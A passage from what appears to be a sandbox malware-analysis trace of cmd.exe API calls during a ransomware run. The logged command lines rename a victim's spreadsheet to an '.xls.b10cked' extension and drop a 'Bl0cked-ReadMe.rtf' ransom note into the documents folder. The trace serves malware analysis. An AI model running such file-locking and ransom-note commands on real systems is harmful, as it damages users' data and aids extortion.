lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0xc0, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x0, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegCloseKey (hKey=0x40) returned 0x0 [0132.571] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee964 | out: phkResult=0x2ee964*=0x40) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x0, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x9, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x9, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x9, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegCloseKey (hKey=0x40) returned 0x0 [0132.571] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0132.571] srand (_Seed=0x5b886367) [0132.571] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"" [0132.571] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"" [0132.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.572] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.572] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.572] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.572] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.572] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.572] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.572] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.572] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.572] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.572] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.572] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.572] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.572] GetEnvironmentStringsW () returned 0x3d22e8* [0132.572] FreeEnvironmentStringsW (penv=0x3d22e8) returned 1 [0132.572] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.572] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.572] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.572] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.572] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.572] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.572] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.572] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.572] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.572] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef730 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef730, lpFilePart=0x2ef72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef72c*="Desktop") returned 0x18 [0132.573] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.573] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4ac | out: lpFindFileData=0x2ef4ac) returned 0x3d0028 [0132.573] FindClose (in: hFindFile=0x3d0028 | out: hFindFile=0x3d0028) returned 1 [0132.573] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4ac | out: lpFindFileData=0x2ef4ac) returned 0x3d0028 [0132.573] FindClose (in: hFindFile=0x3d0028 | out: hFindFile=0x3d0028) returned 1 [0132.573] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4ac | out: lpFindFileData=0x2ef4ac) returned 0x3d0028 [0132.573] FindClose (in: hFindFile=0x3d0028 | out: hFindFile=0x3d0028) returned 1 [0132.573] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.573] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.573] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.573] GetEnvironmentStringsW () returned 0x3d2b08* [0132.574] FreeEnvironmentStringsW (penv=0x3d2b08) returned 1 [0132.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.574] GetConsoleOutputCP () returned 0x1b5 [0132.574] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.574] GetUserDefaultLCID () returned 0x409 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef870, cchData=128 | out: lpLCData="0") returned 2 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef870, cchData=128 | out: lpLCData="0") returned 2 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef870, cchData=128 | out: lpLCData="1") returned 2 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.575] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.576] GetConsoleTitleW (in: lpConsoleTitle=0x3c08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.576] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.576] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.576] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.577] _wcsicmp (_String1="move", _String2=")") returned 68 [0132.577] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0132.577] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0132.577] _wcsicmp (_String1="IF", _String2="move") returned -4 [0132.577] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0132.577] _wcsicmp (_String1="REM", _String2="move") returned 5 [0132.577] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0132.579] GetConsoleTitleW (in: lpConsoleTitle=0x2ef568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.580] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0132.580] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="CD") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="REN") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="SET") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0132.580] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0132.580] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0132.580] _wcsicmp (_String1="move", _String2="MD") returned 11 [0132.580] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0132.580] _wcsicmp (_String1="move", _String2="RD") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0132.580] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0132.580] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0132.580] _wcsicmp (_String1="move", _String2="VER") returned -9 [0132.580] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0132.580] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0132.580] _wcsicmp (_String1="move", _String2="START") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0132.580] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0132.582] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.582] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.582] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef324, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef31c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef31c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.583] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0132.583] _wcsicmp (_String1="OASES7~1.XLS", _String2=".") returned 65 [0132.583] _wcsicmp (_String1="OASES7~1.XLS", _String2="..") returned 65 [0132.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7~1.xls")) returned 0x20 [0132.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.583] SetErrorMode (uMode=0x0) returned 0x0 [0132.583] SetErrorMode (uMode=0x1) returned 0x0 [0132.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", nBufferLength=0x104, lpBuffer=0x2eecac, lpFilePart=0x2eec94 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", lpFilePart=0x2eec94*="OASES7~1.XLS") returned 0x2d [0132.584] SetErrorMode (uMode=0x0) returned 0x1 [0132.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x10 [0132.584] _wcsicmp (_String1="OASES7~1.XLS", _String2=".") returned 65 [0132.584] _wcsicmp (_String1="OASES7~1.XLS", _String2="..") returned 65 [0132.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7~1.xls")) returned 0x20 [0132.584] SetErrorMode (uMode=0x0) returned 0x0 [0132.584] SetErrorMode (uMode=0x1) returned 0x0 [0132.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", nBufferLength=0x104, lpBuffer=0x2ef128, lpFilePart=0x2eeec0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", lpFilePart=0x2eeec0*="OASES7~1.XLS") returned 0x2d [0132.584] SetErrorMode (uMode=0x0) returned 0x1 [0132.584] SetErrorMode (uMode=0x0) returned 0x0 [0132.584] SetErrorMode (uMode=0x1) returned 0x0 [0132.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", nBufferLength=0x104, lpBuffer=0x2ef330, lpFilePart=0x2eeec0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", lpFilePart=0x2eeec0*="Oases7ZDuwJ0FV.xls.b10cked") returned 0x3b [0132.584] SetErrorMode (uMode=0x0) returned 0x1 [0132.584] SetLastError (dwErrCode=0x0) [0132.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls.b10cked")) returned 0xffffffff [0132.584] GetLastError () returned 0x2 [0132.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2ee83c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee83c) returned 0x3c0eb0 [0132.584] FindNextFileW (in: hFindFile=0x3c0eb0, lpFindFileData=0x2ee83c | out: lpFindFileData=0x2ee83c) returned 0 [0132.585] GetLastError () returned 0x12 [0132.585] FindClose (in: hFindFile=0x3c0eb0 | out: hFindFile=0x3c0eb0) returned 1 [0132.586] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x3d1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1c08) returned 0x3c0eb0 [0132.586] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", nBufferLength=0x104, lpBuffer=0x2eead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", lpFilePart=0x0) returned 0x3b [0132.586] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls", nBufferLength=0x104, lpBuffer=0x2eead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls", lpFilePart=0x0) returned 0x33 [0132.586] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls")) returned 0x20 [0132.586] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls.b10cked"), dwFlags=0x3) returned 1 [0132.586] FindClose (in: hFindFile=0x3c0eb0 | out: hFindFile=0x3c0eb0) returned 1 [0132.587] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eea88 | out: _Buffer=" 1") returned 9 [0132.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.587] GetFileType (hFile=0x7) returned 0x2 [0132.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea14 | out: lpMode=0x2eea14) returned 1 [0132.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eea48 | out: lpConsoleScreenBufferInfo=0x2eea48) returned 1 [0132.679] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0132.679] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eea88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0132.679] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eea6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eea6c*=0x1a) returned 1 [0132.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.679] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.679] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.679] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.679] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.680] SetConsoleInputExeNameW () returned 0x1 [0132.680] GetConsoleOutputCP () returned 0x1b5 [0132.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.680] exit (_Code=0) Process: id = "116" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12496 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12497 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12498 